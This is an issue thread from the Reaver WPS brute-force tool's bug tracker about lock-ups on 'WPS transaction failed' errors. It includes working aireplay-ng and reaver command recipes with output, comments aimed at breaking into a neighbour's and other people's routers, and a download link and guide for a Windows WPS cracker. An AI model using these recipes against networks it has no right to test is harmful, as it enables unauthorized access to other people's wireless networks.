hotelzululima / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 1 forks source link

WPS transaction failed (code: 0x2), Causes lock up #125

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
It's a rare event but when i get a "WPS transaction failed (code: 0x2)" reaver 
stops function.

I also get a few "WPS transaction failed (code: 0x3)",
But it doesn't lock up on them. First noticed in r84, switched to r87 and it 
still occurs.

Original issue reported on code.google.com by Sca...@gmail.com on 11 Jan 2012 at 11:31

GoogleCodeExporter commented 9 years ago
Command line:
reaver -i mon0 -b 00:26:5A:XX:XX:XX -E -S -t 10 -T 1 -w -vv

Original comment by Sca...@gmail.com on 12 Jan 2012 at 12:12

GoogleCodeExporter commented 9 years ago
Define "reaver stops functioning". Does it sit there and do nothing? Does it 
keep attempting the same pin? What errors/warnings does it display?

Code 2 means Reaver hit a receive timeout. Code 3 means it received an EAP 
failure packet. In either case Reaver should keep trying pins.

Original comment by cheff...@tacnetsol.com on 12 Jan 2012 at 12:14

GoogleCodeExporter commented 9 years ago
It just sits there and does nothing.

[+] Trying pin 94965674
[+] Sending EAPOL START request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x2), re-trying last pin

Always in this order, I have waited +10 minutes. (4 seconds/attempt)
Code 0x3 does keep running.

Let me know how and what other information might help.

Original comment by Sca...@gmail.com on 12 Jan 2012 at 1:08

GoogleCodeExporter commented 9 years ago
Well Reaver isn't doing nothing. :)  It's attempting to initiate a WPS session 
with the AP, but it looks like the AP is simply not responding to Reaver's 
identity response packet. I have seen instances where APs can get stuck in a 
wait state and don't respond for several minutes, but it usually clears up 
after 2 minutes or so.

If you stop and re-start Reaver, do you keep getting the same timeout messages? 
Can you capture the traffic and provide the pcap?

Original comment by cheff...@tacnetsol.com on 12 Jan 2012 at 2:11

GoogleCodeExporter commented 9 years ago
If you stop and restart reaver, It will just continue properly.
Until it hits a code 0x2 again.

I will make a capture after work.

Original comment by Sca...@gmail.com on 12 Jan 2012 at 6:34

GoogleCodeExporter commented 9 years ago
Did another run before updating, it locked up.
Then updated to r90 and it doesn't seem to lock up anymore.

So seems like this issue was resolved in r89.

Original comment by Sca...@gmail.com on 12 Jan 2012 at 6:16

GoogleCodeExporter commented 9 years ago
Spoke to early. Ill attempt to capture it now.

Original comment by Sca...@gmail.com on 12 Jan 2012 at 6:31

GoogleCodeExporter commented 9 years ago
So i figured it out, it locks up because the router hops to a new channel.
And reaver doesn't return to a channel looking state. If i change the channel 
using airodump it will continue.

I have a cap file if you like but i don't think it will be useful, since when 
it hops channel it stops recording.

Original comment by Sca...@gmail.com on 12 Jan 2012 at 6:46

GoogleCodeExporter commented 9 years ago
There was a channel hopping bug, but r85 should have fixed this and should 
identify when an AP has changed channels and switch to the appropriate channel. 
It won't channel hop if you explicitly specify the channel number, or give it 
the --fixed option (which it doesn't look like you are doing). Can you provide 
a pcap of the beacon packets before and after the AP channel hops?

Original comment by cheff...@tacnetsol.com on 16 Jan 2012 at 5:13

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Hi, I'm really thankful for your continued attempts to fix bugs and 
incompatibilities, even though I've never seen Reaver work with my own eyes.

Using r97 I have transaction failures (codes 0x3 and 0x2), and I receive 2 M1 
packets.

Informations:
- Signal strength is -60 but last time I checked it was the same with -40.
- Still using Intel Wireless Link 5100 (iwlagn) and BT5 R1 Gnome 32bits against 
a Livebox 2 (routeur Sagem F@st 3xxx) with a 12345670 default PIN.
- Again I'm sorry for providing no pcap.

Shell #1: aireplay-ng mon0 --fakeauth 600 -a xx:xx:xx:xx:xx:xx -e Livebox-XXXX
Shell #2: sudo reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv -A

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Switching mon0 to channel 6
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: Livebox-XXXX)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x3), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x2), re-trying last pin
// (repeat from line 4)
^C
[+] Nothing done, nothing to save.

Original comment by b1957...@nwldx.com on 16 Jan 2012 at 11:11

GoogleCodeExporter commented 9 years ago
try experimentig with other wlan adapters and AP's

Original comment by patricks...@gmail.com on 16 Jan 2012 at 11:16

GoogleCodeExporter commented 9 years ago
I tried on different kind of APs without success, but yes I intend to double 
check regularly. I could not check r97 on another AP yet. And unfortunately I 
don't have another adapter with a BT5 driver capable of injection. >_<

I am also fiddling every now and then with wpa_cli and wpa_supplicant to check 
whether I can connect to APs using a correct PIN but no WPA key. (if wpa_cli 
can't do this, then how could Reaver? Failure should prove that it's not a 
Reaver issue and remove a thorn in Cheff's side, I'd say... I'm not using 
wpa_cli/wpa_supplicant correctly yet though, still learning)

Also, is there any approximate date for Reaver integration within Aircrack lib?

Original comment by b1957...@nwldx.com on 16 Jan 2012 at 11:29

GoogleCodeExporter commented 9 years ago
A branch has been created in the aircrack-ng project for reaver. Version 1.2 is 
about to be released, so reaver will be included in the 1.3 release, though I 
can't say when that will be.

Original comment by cheff...@tacnetsol.com on 17 Jan 2012 at 1:17

GoogleCodeExporter commented 9 years ago
I'll keep an eye on that branch then. Thanks for your patience. :) *tiptoes 
away*

Original comment by b1957...@nwldx.com on 17 Jan 2012 at 5:34

GoogleCodeExporter commented 9 years ago
I've experienced the same issues using an Alfa rtl8187. I've found the solution 
to the problem is to play with the "-d" flag.

Start at "-d 15" or higher until you stop receiving the (code: 0x02) (code: 
0x03) errors. Then work your way down. Each router I've tested likes a 
different value. 

I was also using the "--no-nacks" argument.

Original comment by cryptom...@gmail.com on 4 Feb 2012 at 6:04

GoogleCodeExporter commented 9 years ago
I'm using ALfa rtl8187. reaver 1.4

found this way to make it work

1. run: aireplay-ng mon0 -1 120 -a 68:7F:74:E2:4A:1C -e kitty-Home
2. then: reaver -i mon0 -A -b 68:7F:74:E2:4A:1C -c 6 -vv --no-nacks --win7

hope this help ;)

Original comment by itmanvn on 12 Feb 2012 at 2:40

GoogleCodeExporter commented 9 years ago
>>I'm using ALfa rtl8187. reaver 1.4
>>
>>found this way to make it work
>>
>>1. run: aireplay-ng mon0 -1 120 -a 68:7F:74:E2:4A:1C -e kitty-Home
>>2. then: reaver -i mon0 -A -b 68:7F:74:E2:4A:1C -c 6 -vv --no-nacks --win7
>>
>>hope this help ;)

Thank you for this comment! This worked for me. Kind of. I'm also using an Alfa 
rtl8187; reaver 1.4 on BT5. As I was saying, this worked for me but now I am 
stuck at 20.XX% seemingly because aireplay can no longer attack the AP. The 
reason I say seemingly, is because I've tried over 5 different APs and I cannot 
get the same method to work again even though aireplay does work on them. 

root@root:~# sudo aireplay-ng mon0 -1 120 -a XX:XX:XX:XX:XX -e linksys
No source MAC (-h) specified. Using the device MAC (XX:XX:XX:XX:XX:XX)
09:06:51  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 1

09:06:51  Sending Authentication Request (Open System)

09:06:53  Sending Authentication Request (Open System)

09:06:55  Sending Authentication Request (Open System)

09:06:57  Sending Authentication Request (Open System)

09:06:59  Sending Authentication Request (Open System)

09:07:01  Sending Authentication Request (Open System)

09:07:03  Sending Authentication Request (Open System)

09:07:05  Sending Authentication Request (Open System)

09:07:07  Sending Authentication Request (Open System)

09:07:09  Sending Authentication Request (Open System)

09:07:11  Sending Authentication Request (Open System)

09:07:13  Sending Authentication Request (Open System)

09:07:15  Sending Authentication Request (Open System)

09:07:17  Sending Authentication Request (Open System)

09:07:19  Sending Authentication Request (Open System)

09:07:21  Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
      the transmit rate.

root@root:~# sudo reaver -i mon0 -A -b XX:XX:XX:XX:XX:XX -c 1 -vv --no-nacks 
--win7

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 1
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: linksys)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures

root@root:~# aireplay-ng --test -e linksys -a XX:XX:XX:XX:XX:XX mon0
09:09:33  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 1
09:09:33  Trying broadcast probe requests...
09:09:33  Injection is working!
09:09:35  Found 1 AP 

09:09:35  Trying directed probe requests...
09:09:35  XX:XX:XX:XX:XX:XX - channel: 1 - 'linksys'
09:09:36  Ping (min/avg/max): 4.586ms/36.119ms/46.289ms Power: -39.83
09:09:36  30/30: 100%

Any comments or suggestions would be greatly appreciated!

Original comment by shoredit...@gmail.com on 20 Feb 2012 at 8:20

GoogleCodeExporter commented 9 years ago
start airodump-ng  and scan -bssid of selected network and on selected -channel 
and start reaver using options -S -N -L worked excellent for me....

Original comment by bmark...@vus.hr on 20 Feb 2012 at 9:06

GoogleCodeExporter commented 9 years ago
most likely the AP you are trying to associate with accepts connections only 
with certain mac addresses, in other words has a mac filter 

Original comment by AntonR...@gmail.com on 21 Feb 2012 at 12:15

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Comment 19 worked!

So we have 2 steps

1. aireplay-ng -1 10 -a XX:XX:XX:XX:XX:XX -e XX mon0 --ignore-negative-one

10:39:13  Sending Authentication Request (Open System) [ACK]
10:39:13  Authentication successful
10:39:13  Sending Association Request [ACK]
10:39:13  Association successful :-) (AID: 1)

Start new terminal

2. reaver -A -b XX:XX:XX:XX:XX:XX -c 11 -vv -i mon0 --dh-small --no-nacks 
--ignore-locks --win7 -d 15

[+] 2.02% complete @ 2012-02-21 10:36:40 (31 seconds/pin)

If error: WPS transaction failed (code: 0x02), re-trying last pin
just increase -d value: ex -d 20, -d 25 and so on ;)

Original comment by itmanvn on 21 Feb 2012 at 3:40

GoogleCodeExporter commented 9 years ago
I have successfully Reaver hacked my old back up Netgear router, even though it 
took a very long time as it would shut down after 20 or so attempts and then 
time out for 5 minutes. 
I'm now trying to prove my neighbor wrong and hack his router. I had to show 
him that WEP was not good, you would think he would believe me about WPA now. 
Anyway. When I try his router it gets to [+] Sending M4 (after the first PIN 
attempt) and then will not respond. I've tried everything I could think of and 
can never get a response after M4. 
I was hoping to try the aireplay Assoc method above, but when I try to use the 
-A setting Reaver still seems to want to associate with it. What am I doing 
wrong? 
I started aireplay, then did 

# reaver -A -b 00:1C:DF:XX:XX:XX -c 6 -vv -i mon0 --dh-small --no-nacks 
--ignore-locks --win7 -d 15

but got this response (still Associating);

[+] Switching mon0 to channel 6
[+] Waiting for beacon from 00:1C:DF:XX:XX:XX
[+] Associated with 00:1C:DF:CC:AE:54 (ESSID: XXXXXX)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message

Original comment by Curtis.B...@gmail.com on 21 Feb 2012 at 7:58

GoogleCodeExporter commented 9 years ago
so I am having the same exact issue as the post directly above: when running 
reaver on my cisco wap4410n access point, After trying the first pins or so, 
reaver gets stuck at Sending M4 Message.... Is the access point locking up and 
not allowing attempts anymore? Could using the --ignore-locks option help at 
all? I am pretty confused about this because I have tried it with other access 
points and it worked ok...

Original comment by mayangvi...@gmail.com on 22 Feb 2012 at 2:35

GoogleCodeExporter commented 9 years ago
when i use reaver -i mon0 -b (bssid) it give 
WARNING: Failed to associate with (bssid)
then i used reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 11 -e network_name -vv -A
it did get associate with bssid but then it stucks 

sfz420@gmail.com

Original comment by sfz...@gmail.com on 22 Mar 2012 at 7:41

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
this seems to work for me
terminal 1 
 aireplay-ng mon0 -1 120 -a B0:48:7A:**:**:** -q 5

terminal 2
reaver -i mon0 -c 1 -b B0:48:7A:**:**:** -d 10 -x 3 -r 5:3 -N -S -L -vv --win7

hope this helps someone

Original comment by jamesde...@gmail.com on 25 Jan 2013 at 11:05

GoogleCodeExporter commented 9 years ago
i have the same problem any help please.... 
Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x3), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x2), re-trying last pin

Original comment by asjadme...@gmail.com on 6 May 2013 at 1:10

GoogleCodeExporter commented 9 years ago
Any solution to fix this issue definitely? I use the AWUS036H adaptor and 
getting always the "WPS transaction failed". 

Original comment by ivan.si...@gmail.com on 2 Aug 2013 at 10:13

GoogleCodeExporter commented 9 years ago
While Hacking SegamCom Router by Reaver it Stuck at
Trying Pin 12345670

and Stop here , is there any Solution to hack SegamCom Routers Via Reaver, 
while WPS-Locked is No.

Help is required Brothers

Original comment by farrukhb...@gmail.com on 20 Dec 2013 at 6:27

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
I always get stuck by wps transaction failed.

Original comment by bobowong...@gmail.com on 28 Apr 2014 at 3:05

GoogleCodeExporter commented 9 years ago
is there a fix? same problem here, always.

Original comment by M.K.Zer...@gmail.com on 24 Oct 2014 at 12:27

GoogleCodeExporter commented 9 years ago
can someone out there pls. help.

Original comment by kkchiu...@gmail.com on 19 Jan 2015 at 8:28

GoogleCodeExporter commented 9 years ago
Hi, Also You can use Dummper In Windows Platform!
Just Scan Networks And select Any Witch WPS Is Available And brute force With 
This guide:

Please First Install WinCap.exe & JumpStart.exe
then Run Dummper.exe (Portable). Recommended Run Latest Version.
In Dummper => Redes Tab, Select Your Network Interface Card (NIC)
then Go to WPS Tab And Click Todas Les Redes Radio Button
In The Next Step , Click On Scan Button And Select The Network Which You Want 
To Hack!
Then click on Jump start Button under the List and Wait to Hack Your Selected 
Network!
Good Luck ;)

Download Required Software In Mediafire.com
https://www.mediafire.com/?l61rh7q0z6izcxi

Original comment by sashah...@gmail.com on 19 Jan 2015 at 3:54

GoogleCodeExporter commented 9 years ago
This is my set up. 
I have an Alfa AWUS036NHA - VirtualBox on Windows 7

My problem is that reaver fails to associate every so often, therefore I can't 
leave it running over night, because when it fails. I have to Manually 
associate the AP. 

I was wondering if there is a command that I can use to automatically re 
associate without having to run airodump

If it gets stuck , or fails at associating I just do airodump-ng mon0 . I wait 
10 seconds or so and proceed to run reaver
 WARNING: Failed to associate with <macaddress> (ESSID: xxxxxx) I quit the process and have to re associate.  Anyways here is my reaver code that works for me.

reaver -i mon0 -b <mac> -S -N -a -c <channel> -vv -r 17:30

How often does reaver have to associate ? is there a reason why it loses its 
association? 

Thank you !

Original comment by fraf...@gmail.com on 15 Feb 2015 at 4:35